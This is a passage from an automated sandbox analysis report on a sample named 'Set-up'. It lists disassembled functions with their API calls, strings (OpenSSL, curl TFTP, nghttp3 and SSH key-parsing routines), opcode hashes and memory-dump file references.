                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5d0625db26d0674688a489d7695d7d15edd252d4499e9e2a5cb042b9942730d5
                          • Instruction ID: 2efcaf76d182e919fe7d4f2d68bf7b1a294611057edc7c93a4098a7512e8c897
                          • Opcode Fuzzy Hash: 5d0625db26d0674688a489d7695d7d15edd252d4499e9e2a5cb042b9942730d5
                          • Instruction Fuzzy Hash: 8871AA717047068FC715DE29C481A2AB7E5BF89784F5A862CE956CB359E730EC11CB80
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memset
                          • String ID:
                          • API String ID: 2221118986-0
                          • Opcode ID: 3400be7b8facd11ef409ec5683418db74065e4f3cadbe330ca5d0aa6aa79c659
                          • Instruction ID: ca975220652fd957b07ec24db68a70b9ac9557df5651d25582abdc7b812fd23b
                          • Opcode Fuzzy Hash: 3400be7b8facd11ef409ec5683418db74065e4f3cadbe330ca5d0aa6aa79c659
                          • Instruction Fuzzy Hash: 238139B2D14B82CBD3159F24C8816B6B7A0FFDA310F159B5EE8E616782E7749580C781
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
                          • Instruction ID: c5dc07697e3d280bb61b9906db8fab4792da6c3349ae47cc700a882f3f16756e
                          • Opcode Fuzzy Hash: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
                          • Instruction Fuzzy Hash: EA71D4751043068BC71AAF6CD4D0169FBF1BF88310F69CAADEA9987342D634EC95CB80
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                          • Instruction ID: e936e7c0c12c7f3f64180f17d2a2640c449d4ef8c48467a6769175082a1dddc0
                          • Opcode Fuzzy Hash: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
                          • Instruction Fuzzy Hash: 0671D47150871A8BCB1A9F6DD5D4169FBE1BF88300F1A8B6DD98987342D334EC95CB81
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                          • Instruction ID: 867018a68a29253b82a8d83ceb09723be52383eef51e5fcf44bc332910112d20
                          • Opcode Fuzzy Hash: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
                          • Instruction Fuzzy Hash: D1512676B093514BDB148E6C948066EB7E1FB9A318F2947BCD4DA8B352C320DD47C791
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                          • Instruction ID: cb8fd5e88f90a5309978d719dab71e044a8b61962371602cfef81162fd37fdfc
                          • Opcode Fuzzy Hash: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
                          • Instruction Fuzzy Hash: 70519E76A08A258BCB199F99C1D0029FBF2BB88304F16C76DD99967741C330AD64CBC2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                          • Instruction ID: 436da437a033c1e89490651f3714567b66ba1e17c8a88c797f1ac603bd49345f
                          • Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
                          • Instruction Fuzzy Hash: 6831C232308B1A4BC755EE69C4C022BF6D7DBDA360F55C63DE589C3780EA718C48C682
                          APIs
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 002185B6
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ANY PRIVATE KEY), ref: 002185CC
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PARAMETERS), ref: 002185E2
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X9.42 DH PARAMETERS), ref: 002185F8
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DH PARAMETERS), ref: 0021860A
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X509 CERTIFICATE), ref: 00218620
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00218634
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NEW CERTIFICATE REQUEST), ref: 0021864A
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE REQUEST), ref: 0021865C
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00218672
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 002186A0
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 002186BA
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 002186D0
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 002186E2
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 002186FC
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00218712
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 0021872A
                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00218686
                            • Part of subcall function 001FCBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,001D7254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,001D40BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,001FBD91), ref: 001FCBD2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strcmp$free
                          • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
                          • API String ID: 3401341699-4246700284
                          • Opcode ID: 612fdbbb81e826c37f0a40061ce9fff70b6424cb9753b2ef2100e3d54366f7c3
                          • Instruction ID: d36e7109b7c0f70c68755576f38557f3ba22050990a73dcb7598c10db95cd52e
                          • Opcode Fuzzy Hash: 612fdbbb81e826c37f0a40061ce9fff70b6424cb9753b2ef2100e3d54366f7c3
                          • Instruction Fuzzy Hash: 95B139B5A1030666D6216E207C83FFB33C99F71749F080828FD14A52C3FFA5D6659AA2
                          APIs
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 0009204A
                          • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00092068
                          • WSAGetLastError.WS2_32 ref: 000920DE
                          • recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 0009214D
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00092365
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 0009238F
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 000923B9
                          • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 0009241D
                          • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 000924AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _time64memchrstrtol$ErrorLastrecvfromstrlen
                          • String ID: %s (%d)$%s (%d) %s (%d)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP error: %s$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
                          • API String ID: 3302935713-3407012168
                          • Opcode ID: 1d1d41625107fc619fbbd7ad56a87c76880980dc4fa5536c8d8b45bda7404a93
                          • Instruction ID: 641c37342d15f4fd8f2d887449413b77a6e90db7c0c1bd299d813c85c810503e
                          • Opcode Fuzzy Hash: 1d1d41625107fc619fbbd7ad56a87c76880980dc4fa5536c8d8b45bda7404a93
                          • Instruction Fuzzy Hash: 27E12471A04301BBDB209B24DC46B6FBBE5FF95710F088528F8599B292E774EE10D792
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?), ref: 000CA29A
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(0000000F,?,?), ref: 000CA2C5
                          • memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 000CA2E3
                            • Part of subcall function 000CA5A0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 000CA5FC
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy$memmove
                          • String ID: i < blk->n - 1$i > 0$lblk->n <= NGHTTP3_KSL_MAX_NBLK - n$lblk->n >= NGHTTP3_KSL_MIN_NBLK + n$n > 0$nghttp3_ksl.c$node->blk->n == NGHTTP3_KSL_MIN_NBLK$rblk->n <= NGHTTP3_KSL_MAX_NBLK - n$rblk->n >= NGHTTP3_KSL_MIN_NBLK + n
                          • API String ID: 1283327689-1606465060
                          • Opcode ID: 68e23b202f0464a032d6affdb067484ee22d09f3a386abfd2a54e44a1d04916b
                          • Instruction ID: bc04e581191da2d3b2ee29fb044cf4b4245416fd924070ebb98b18173a0e5568
                          • Opcode Fuzzy Hash: 68e23b202f0464a032d6affdb067484ee22d09f3a386abfd2a54e44a1d04916b
                          • Instruction Fuzzy Hash: D9C1B0717002099FC718DF14C886EAEB7E6FF99308F58852DE9498B292D770ED44CB92
                          APIs
                          • fopen.API-MS-WIN-CRT-STDIO-L1-1-0(?,005E4675), ref: 00114094
                          • feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 001140A3
                          • rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 001140B0
                          • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000001,00000000), ref: 001140D6
                          • feof.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 001140F4
                          • rewind.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00114101
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0011410F
                          • fread.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000), ref: 0011413F
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0011414C
                          • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00114165
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 00114186
                          • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 001141A0
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000020,00000000), ref: 001141BA
                          • memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000001,00000020,00000000), ref: 001141E4
                          Strings
                          • Unable to read public key from file, xrefs: 001141A8
                          • Invalid public key data, xrefs: 0011422E
                          • Unable to allocate memory for public key data, xrefs: 0011418E
                          • Invalid key data, not base64 encoded, xrefs: 00114214
                          • Invalid data in public key file, xrefs: 00114117
                          • Unable to open public key file, xrefs: 001140BA
                          • Missing public key data, xrefs: 0011417E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: fclose$feoffreadmemchrrewind$fopenisspace
                          • String ID: Invalid data in public key file$Invalid key data, not base64 encoded$Invalid public key data$Missing public key data$Unable to allocate memory for public key data$Unable to open public key file$Unable to read public key from file
                          • API String ID: 752180523-3150497671
                          • Opcode ID: 2029ca049d46952b50f34639f1407cadf983eda7bf3319fb6ed333d89a754bd0
                          • Instruction ID: 94e3f2b72934a62d232d86ec51ae161496f347c8990fb3204f86801de8d6cb8c
                          • Opcode Fuzzy Hash: 2029ca049d46952b50f34639f1407cadf983eda7bf3319fb6ed333d89a754bd0
                          • Instruction Fuzzy Hash: AB510BF1A043047BD6186B35AC46E6B7A9CDF67765F040438FC4EC6282FB31E9948976
                          APIs
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00092AD7
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00092B3D
                          • sendto.WS2_32(?,?,?,00000000,?,00000007), ref: 00092D30
                          • WSAGetLastError.WS2_32 ref: 00092D3A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
